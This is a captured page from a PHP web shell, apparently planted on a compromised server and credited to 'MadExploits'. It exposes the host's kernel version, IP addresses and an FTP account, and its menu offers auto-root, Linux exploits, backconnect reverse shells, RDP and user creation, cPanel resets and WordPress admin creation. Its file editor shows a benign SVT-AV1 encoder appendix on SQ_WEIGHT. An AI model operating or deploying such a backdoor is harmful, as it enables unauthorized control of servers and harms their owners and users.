Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
svt-av1-libs /
Docs /
[ HOME SHELL ]
Name
Size
Permission
Action
img
[ DIR ]
drwxr-xr-x
Appendix-Alt-Refs.md
15.95
KB
-rw-r--r--
Appendix-CDEF.md
25.19
KB
-rw-r--r--
Appendix-CfL.md
8.8
KB
-rw-r--r--
Appendix-Compliant-Subpel-Inte...
10.77
KB
-rw-r--r--
Appendix-Compound-Mode-Predict...
22.17
KB
-rw-r--r--
Appendix-DLF.md
25.13
KB
-rw-r--r--
Appendix-Film-Grain-Synthesis....
12.45
KB
-rw-r--r--
Appendix-Filter-Intra.md
6.61
KB
-rw-r--r--
Appendix-Global-Motion.md
16.15
KB
-rw-r--r--
Appendix-Intra-Block-Copy.md
7.4
KB
-rw-r--r--
Appendix-Local-Warped-Motion.m...
17.24
KB
-rw-r--r--
Appendix-Palette-Prediction.md
8.63
KB
-rw-r--r--
Appendix-Restoration-Filter.md
21.99
KB
-rw-r--r--
Appendix-SQ-Weight.md
1.21
KB
-rw-r--r--
Appendix-Subpel-Interpolation-...
5.93
KB
-rw-r--r--
Appendix-TX-Search.md
13.03
KB
-rw-r--r--
Appendix-Variance-Based-Adapti...
12.4
KB
-rw-r--r--
README.md
1.43
KB
-rw-r--r--
svt-av1-decoder-design.md
32.03
KB
-rw-r--r--
svt-av1-encoder-design.md
66.78
KB
-rw-r--r--
svt-av1_decoder_user_guide.md
1.82
KB
-rw-r--r--
svt-av1_encoder_user_guide.md
28.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Appendix-SQ-Weight.md
# SQ_Weight Appendix ## Description SQ\_WEIGHT determines if the evaluation of HA, HB, VA, VB, H4 and V4 shapes could be skipped based on the cost of SQ, H and V shapes. Specifically: - skip HA, HB and H4 if (valid SQ and H) and (H\_COST \> (SQ\_WEIGHT \* SQ\_COST) / 100) - skip VA, VB and V4 if (valid SQ and V) and (V\_COST \> (SQ\_WEIGHT \* SQ\_COST) / 100) - `The lower the SQ_WEIGHT, the higher the chance to skip NSQ` ## SQ\_WEIGHT Derivation SQ\_WEIGHT = **Base** + **Offset** **Base = f(Preset)** **Preset(s)** | **BASE** ---------------| --------- MR | ∞ M0 | 105 M1 | 105 M2 | 100 M3 & beyond | 95 **Offset = f (Target Shape, Block/PIC Type, Coeff Info, QP)**  PS.  ## Notes The feature settings that are described in this document were compiled at v0.8.3 of the code and may not reflect the current status of the code. The description in this document represents an example showing how features would interact with the SVT architecture. For the most up-to-date settings, it's recommended to review the section of the code implementing this feature.
Close